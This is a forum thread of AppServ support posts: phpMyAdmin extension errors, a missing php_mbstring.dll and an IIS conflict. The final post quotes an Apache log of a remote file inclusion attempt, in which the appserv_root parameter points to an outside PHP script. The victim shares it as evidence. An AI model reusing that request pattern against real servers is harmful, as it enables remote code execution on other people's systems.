When i go to phpmyadmin, i get the following error:
Cannot load mysql extension. Please check your PHP configuration.
I have had this error with both 2.5.10 and 2.5.9
please help!

php_mbstring.dll (2.5.10) not found
on Windows XP or Windows 2003
on "Command Prompt" Mode

cd C:\AppServ\www
C:\AppServ\php5\php.exe C:\AppServ\www\phpinfo.php

This program can not start, because find php_mbstring.dll
But I can use normally on AppServ 2.5.9
If I add "C:\AppServ\php5\ext" to %PATH% Enviroment Variable,
program could run correctly

2.5.10 conflit with IIS on Windows XP
1. Install AppServ 2.5.10
2. Stop Apache on Services of Control Pad
3. Install IIS
4. do something ...
5. Stop IIS on Services of Control Pad
6. Start Apache on Services of Control Pad ... Failed
But I can use normally on AppServ 2.5.9

in fact, it's recomended apache 1.X for Windows 98/98SE/ME.

It is very good work!
I have tried many variation to start Apache 2.4 and PHP5, manually installing, configuring, and other packages too, but only your system were successfuly on my WinXP.

Dear sirs,
Yesterday someone used an exploit on my server trough which I believe to be a vulnerability in Appserv. The apache logfile in question is this:
84.228.172.26 - - [10/Jan/2007:17:43:41 +0100] "GET /nutwork/appserv/main?appserv_root=http://hkr159.tripod.com/ch99.php HTTP/1.1" 404 307
Note that nutwork contains the original AppServ webroot files. Seeing how my expertise lays...
